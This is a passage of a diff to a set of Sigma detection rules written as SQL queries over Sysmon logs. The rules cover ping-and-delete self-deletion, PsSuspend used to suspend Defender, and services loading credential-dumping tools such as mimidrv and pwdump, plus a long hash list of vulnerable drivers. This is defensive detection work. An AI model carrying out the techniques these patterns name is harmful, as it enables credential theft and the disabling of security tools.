('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": 
"driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + 
"filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d702d88b12233be9413446c445f22fda4a92a1d9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=910cb12aa49e9f35ecc4907e8304adf0dcca8cf1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4ed28fdfba7b8a8dfe39e591006f25d39990f07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b0032b8d8e6f4bd19a31619ce38d8e010f29a816%' ESCAPE '\\' OR Hashes LIKE '%SHA1=db6245578ec57bd767b27ecf8085095e1c8e5a6e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=166759fd511613414d3213942fe2575b926a6226%' ESCAPE '\\' OR Hashes LIKE '%SHA1=02a8b74899591da7b7f49c0450328d39b939d7e4%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=98ceed786f79288becc08c3b82c57e8d4bfa1bca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f6b3577ea4b1a5641ae3421151a26268434c3db8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4de33d03fee52f396a1c788000ca868d56ac30de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6920171fa6dff2c17eb83befb5fd28e8dddf5f0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fbc6d2448739ddec35bb5d6c94b46df4148f648d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6b54f8f137778c1391285fee6150dfa58a8120b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=943593e880b4d340f2548548e6e673ef6f61eed3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e44297a2b750ec1958bef265e2f1ae6fa4323b28%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aa2ea973bb248b18973e57339307cfb8d309f687%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3a5d176c50f97b71d139767ed795d178623f491d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=25d812a5ece19ea375178ef9d60415841087726e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3795e32592ab6d8074b6f7ad33759c6a39b0df07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fc121ed6fb37e97a004b6faf217435b772dfc4c0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ab2b8602e4baef828b58b995d0889a8e5b8dbd02%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cf040040628b58f4a811f98c2690913c1e8e4e3c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3296844d22c87dd5eba3aa378a8242b41d59db7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bc47e15537fa7c32dfefd23168d7e1741f8477ed%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb22723faa5ae2809476e5c5e9b9a597b26cab9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f3c5e723ae009b336cd2719137b8cd194c9ee51d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41f2d0f9863bce8920c207b1ef5d3d32b603edef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb93d2f564fea9b3dc350f386b45de2cd9a3e001%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3cd037fbba8aae82c1b111c9f8755349c98bcb3c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9401389fba314d1810f83edce33c37e84a78e112%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371%' ESCAPE '\\' OR Hashes LIKE '%SHA1=16d7ecf09fc98798a6170e4cef2745e0bee3f5c7%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=fcd615df88645d1f57ff5702bd6758b77efea6d0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f3db629cfe37a73144d5258e64d9dd8b38084cf4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a00e444120449e35641d58e62ed64bb9c9f518d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=38571f14fc014487194d1eecfa80561ee8644e09%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4d41248078181c7f61e6e4906aa96bbdea320dc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3599ea2ac1fa78f423423a4cf90106ea0938dde8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3d6d53b0f1cc908b898610227b9f1b9352137aba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4c18754dca481f107f0923fb8ef5e149d128525d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cde32654a041fedc7b0fa1083f6005b950760062%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5fb9421be8a8b08ec395d05e00fd45eb753b593a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b480c54391a2a2f917a44f91a5e9e4590648b332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f7a8e26a97980544be634b26899afbefb0a833c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c1d5cf8c43e7679b782630e93f5e6420ca1749a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7e9a4686aa7291331e2c8708882c8d81d05264f%' ESCAPE '\\' 